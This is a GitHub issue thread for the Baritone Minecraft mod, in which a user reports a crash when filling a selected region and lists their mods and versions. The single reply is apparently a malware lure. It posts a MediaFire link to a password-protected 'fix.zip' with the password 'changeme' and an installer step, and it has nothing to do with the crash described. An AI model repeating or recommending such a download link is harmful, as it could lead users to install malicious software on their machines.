### ISSUE TITLE
Crashing on fill/replace

### ISSUE THREAD

**Issue by Beluga18857** [cabaletta/baritone#4483]
## Some information
Operating system: Kubuntu 24.04 LTS x86_64 (6.8.0-41-generic)
Java version: OpenJDK 11
Minecraft version: 1.20.1 Fabric
Baritone version: 1.10.1
Other mods (if used): 

<details>
  <summary>My Mods</summary>
Ad Astra 1.15.18, jlayer 1.0.1, Advanced XRay (Fabric) 1.20.1-1.6.0-build.17, Applied Energistics 2 15.2.12, AE2 EMI Crafting Integration 1.3.1, AE2WTLib 15.2.1-fabric, AppleSkin 2.5.1+mc1.20, Architectury 9.2.14, Balm 7.3.6, KumaAPI 20.1.8, Baritone 1.10.1, BetterF3 7.0.2, Bookshelf 20.2.13, Botarium 2.3.4, Chat Heads 0.12.9, ChatAnimation 1.0.5, Chat Tools 2.3.3, two-slices 0.9.4, MixinExtras 0.4.0, Chunk Loaders 1.2.8+a, Cinderscapes 4.0.10, Cinderscapes: Client 4.0.10, Cinderscapes: Common 4.0.10, Cinderscapes: World Generation 4.0.10, Terraform Shapes API (v1) 7.0.3, Cloth Config v11 11.1.118, cloth-basic-math 0.6.1, Continuity 3.0.0-beta.5+1.20.1, Controlling For Fabric 12.0.2, Crafting Tweaks 18.2.4, CustomSkinLoader 14.19.1, Debugify 1.20.1+2.0, Drippy Loading Screen 3.0.2, Edgeless Chat Screen 1.1.5, EMI 1.1.10+1.20.1+fabric, EMI Loot 0.6.6+1.20.1, EMI Enchants 1.0.0, EMIffect 1.1.2+mc1.20.1, EMI Trades 1.2.1+mc1.20.1, json 0.2.1, EnchantmentDescriptions 17.0.16, Enhanced Block Entities 0.9+1.20, Runtime Resource Pack 0.6.7, SpruceUI 5.0.0+1.20, EntityCulling 1.6.6, Fabric API 0.92.2+1.20.1, Fabric API Base 0.4.31+1802ada577, Fabric API Lookup API (v1) 1.6.36+1802ada577, Fabric Biome API (v1) 13.0.13+1802ada577, Fabric Block API (v1) 1.0.11+1802ada577, Fabric BlockView API (v2) 1.0.1+1802ada577, Fabric BlockRenderLayer Registration (v1) 1.1.41+1802ada577, Fabric Client Tags 1.1.2+1802ada577, Fabric Command API (v1) 1.2.34+f71b366f77, Fabric Command API (v2) 2.2.13+1802ada577, Fabric Commands (v0) 0.2.51+df3654b377, Fabric Containers (v0) 0.1.64+df3654b377, Fabric Content Registries (v0) 4.0.11+1802ada577, Fabric Convention Tags 1.5.5+1802ada577, Fabric Crash Report Info (v1) 0.2.19+1802ada577, Fabric Data Attachment API (v1) 1.0.0+de0fd6d177, Fabric Data Generation API (v1) 12.3.4+1802ada577, Fabric Dimensions API (v1) 2.1.54+1802ada577, Fabric Entity Events (v1) 1.6.0+1c78457f77, Fabric Events Interaction (v0) 0.6.2+1802ada577, Fabric Events Lifecycle (v0) 0.2.63+df3654b377, Fabric Game Rule API (v1) 1.0.40+1802ada577, Fabric Item API (v1) 2.1.28+1802ada577, Fabric Item Group API (v1) 4.0.12+1802ada577, Fabric Key Binding API (v1) 1.0.37+1802ada577, Fabric Key Bindings (v0) 0.2.35+df3654b377, Fabric Lifecycle Events (v1) 2.2.22+1802ada577, Fabric Loot API (v2) 1.2.1+1802ada577, Fabric Loot Tables (v1) 1.1.45+9e7660c677, Fabric Message API (v1) 5.1.9+1802ada577, Fabric Mining Level API (v1) 2.1.50+1802ada577, Fabric Model Loading API (v1) 1.0.3+1802ada577, Fabric Models (v0) 0.4.2+9386d8a777, Fabric Networking API (v1) 1.3.11+1802ada577, Fabric Networking (v0) 0.3.51+df3654b377, Fabric Object Builder API (v1) 11.1.3+1802ada577, Fabric Particles (v1) 1.1.2+1802ada577, Fabric Recipe API (v1) 1.0.21+1802ada577, Fabric Registry Sync (v0) 2.3.3+1802ada577, Fabric Renderer API (v1) 3.2.1+1802ada577, Fabric Renderer - Indigo 1.5.2+85287f9f77, Fabric Renderer Registries (v1) 3.2.46+df3654b377, Fabric Rendering Data Attachment (v1) 0.3.37+92a0d36777, Fabric Rendering Fluids (v1) 3.0.28+1802ada577, Fabric Rendering (v0) 1.1.49+df3654b377, Fabric Rendering (v1) 3.0.8+1802ada577, Fabric Resource Conditions API (v1) 2.3.8+1802ada577, Fabric Resource Loader (v0) 0.11.10+1802ada577, Fabric Screen API (v1) 2.0.8+1802ada577, Fabric Screen Handler API (v1) 1.3.30+1802ada577, Fabric Sound API (v1) 1.0.13+1802ada577, Fabric Transfer API (v1) 3.3.5+8dd72ea377, Fabric Transitive Access Wideners (v1) 4.3.1+1802ada577, Fabric Language Kotlin 1.11.0+kotlin.2.0.0, kotlin-reflect 2.0.0, kotlin-stdlib 2.0.0, kotlin-stdlib-jdk7 2.0.0, kotlin-stdlib-jdk8 2.0.0, atomicfu-jvm 0.24.0, kotlinx-coroutines-core-jvm 1.8.1, kotlinx-coroutines-jdk8 1.8.1, kotlinx-datetime-jvm 0.6.0, kotlinx-serialization-cbor-jvm 1.6.3, kotlinx-serialization-core-jvm 1.6.3, kotlinx-serialization-json-jvm 1.6.3, Fabric Loader 0.15.11, Fabrishot 1.10.1, FancyMenu 3.2.3, japng 0.5.3, animated-gif-lib-for-java animated-gif-lib-1.7, Forge Config API Port 8.0.0, FTB Library 2001.2.2, FTB Quests 2001.4.6, FTB Teams 2001.3.0, FTB XMod Compat 2.1.1, Geocluster 1.3.4+1.20.1, Cardinal Components API (base) 5.2.1, Cardinal Components API (worlds) 5.2.1, MidnightLib 1.4.1, ImmediatelyFast 1.2.18+1.20.4, Reflect 1.3.4, Indium 1.0.34+mc1.20.1, Inventory Management 2.0.0, roundalib 1.3.0+1.20, Iris 1.7.2+mc1.20.1, glsl-transformer 2.0.1, jcpp 1.4.14, antlr4-runtime 4.13.1, Item Filters 2001.1.0-build.59, Jade 11.10.0+fabric, Jade Addons 5.2.6, OpenJDK 64-Bit Server VM 17, Konkrete 1.8.1, Krypton 0.2.3, velocity-native 3.2.0-SNAPSHOT, LazyDFU 0.1.3, LibrarianLib 4.2.11, LibZoomer 0.6.6+1.20.1, Lithium 0.11.3, MemoryLeakFix 1.3.0, Minecraft 1.20.1, Mind The Gap 5.1.1, Miners Helmet 1.20.1-3.3.0, Mod Menu 7.0.1, FerriteCore 6.3.0, Smooth Boot 2.1.0, Sodium 0.5.0, Mouse Tweaks 3.2.0, Mutil 5.2.2, Name Pain 5.2.0, Pack Menu 7.2.0, Patchouli 85.1, Pehkui 4.0.1, Puzzles Lib 8.2.6, Reese's Sodium Options 1.5.0, Roughly Enough Items 12.0.755, cloth-config 12.0.105, Roughly Enough Resources 7.1.584, Sodium Extra 1.5.0+mc1.20.1-build.100, Starlight 1.1.2+fabric.ae22326, styled-nicknames 1.1.0, Tinker's Things 1.3.0, tooltipfix 1.1.4+1.20, Trinkets 3.11.1+fabric-3a34aef1db-1.20.1, TRansliterationLib 2.4.0, vmp 1.2.0+beta.12.13, Voyager 1.0.0+1.20.1, WTHIT 9.2.7+fabric+2.0.0, Xaero's Minimap 23.4.2, Xaero's World Map 1.30.6, ZeroCore 10.0.15+1.20.1
</details>

## Exception, error or logs
[report.txt](https://github.com/user-attachments/files/16776788/report.txt)

## How to reproduce
Go to the server. Select the region with #select, then #select fill minecraft:yellow_terracota, wait 30-60 seconds -> profit

## Modified settings
Nothing.

## Final checklist
- [x] I know how to properly use check boxes 
- [x] I have included the version of Minecraft I'm running, baritone's version and forge mods (if used).
- [x] I have included logs, exceptions and / or steps to reproduce the issue.
- [x] I have not used any OwO's or UwU's in this issue.

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
